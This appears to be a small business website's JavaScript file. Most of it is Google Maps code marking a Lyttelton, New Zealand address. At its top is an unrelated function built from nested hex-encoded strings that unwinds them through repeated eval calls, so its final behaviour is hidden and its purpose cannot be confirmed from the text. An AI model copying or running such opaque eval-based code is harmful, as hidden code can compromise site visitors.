function enk(){var i,j,x,y,x=
"x=\"783d223738336432323334363533363338333636363336363133363631333336363336" +
"33343337363333363339333633313336363433363332333236333335363433333336333633" +
"35333633323337333833363330333233313336363333333332333233383332333533363334" +
"33373339333633323337333733373635333233343337363533363335333636343336333533" +
"37333333363636333633343336356332323364373833373336333633303333333233333335" +
"33323339333733323337333933363335333733313337363533363335333636343333333433" +
"37333333363335333636313336333233363335333733333337363633333631333736353336" +
"36353332363633363333333636353332333333373335333633363337333933363633333633" +
"37333636353336333933363633333636333336333533363334333733303336363333363335" +
"33363334333733303334363533363338333636363336363133363635333333323332363333" +
"35363133373635333636353332363633363333333636353332333333373335333633363337" +
"33393336363333363337333636353336333933363633333636333336333533363334333736" +
"35333233373337333733373337333733303333333233333335333236343336363633363332" +
"32393332336432623639336236383734363736653635366332653738336336393362333033" +
"64363932383732366636363362323732373364373933623563323236323333333033333632" +
"33333339333233323332363533333331333636363332363333333631333736353336363533" +
"32363633363333333636353332333333373335333633363337333933363633333633373336" +
"36353336333933363633373937643362323932393332326336393238373237343733363237" +
"35373332653738326232373235323732383635373036313633373336353665373533643262" +
"37393762323233623739336432373237336236363666373232383639336433303362363933" +
"63373832653663363536653637373436383362363932623364333733383239376236363666" +
"37323238366133643464363137343638326536643639366532383738326536633635366536" +
"37373436383263363932623337333832393362326432643661336533643639336232393762" +
"37393262336437383265363336383631373234313734323836613239336237643764373933" +
"62223b793d27273b666f7228693d303b693c782e6c656e6774683b692b3d32297b792b3d75" +
"6e657363617065282725272b782e73756273747228692c3229293b7d79\";y='';for(i=0;" +
"i<x.length;i+=2){y+=unescape('%'+x.substr(i,2));}y";
while(x=eval(x));};
// centre video vertically on home page 
/*
$('document').ready(function(){
	$('#home div.col1 p').css('height', 330);
	var col2Height = $('#home .col2').height(); 
	var pushDown = (col2Height - 330) / 2;
	$('#home div.col1 object').css('margin-top', pushDown);
});*/

// Google Map on location page
function initialize() {
  var myLatlng = new google.maps.LatLng(-43.607795, 172.701722);
  var mapCentre = new google.maps.LatLng(-43.602739,172.717394);
  var myOptions = {
    zoom: 14,
    center: mapCentre,
    mapTypeId: google.maps.MapTypeId.ROADMAP
  }
  var map = new google.maps.Map(document.getElementById("map_canvas"), myOptions);
  var marker = new google.maps.Marker({
      position: myLatlng, 
      map: map
  });   
  var infowindow = new google.maps.InfoWindow({
    content: '<p>Telling Lives<br />96 Cressy Terrace<br />Lyttleton<br />New Zealand</p>'
  });
  infowindow.open(map,marker);
}
  
function loadScript() {
  var script = document.createElement("script");
  script.type = "text/javascript";
  script.src = "http://maps.google.com/maps/api/js?sensor=false&callback=initialize";
  document.body.appendChild(script);
}
  
window.onload = loadScript;

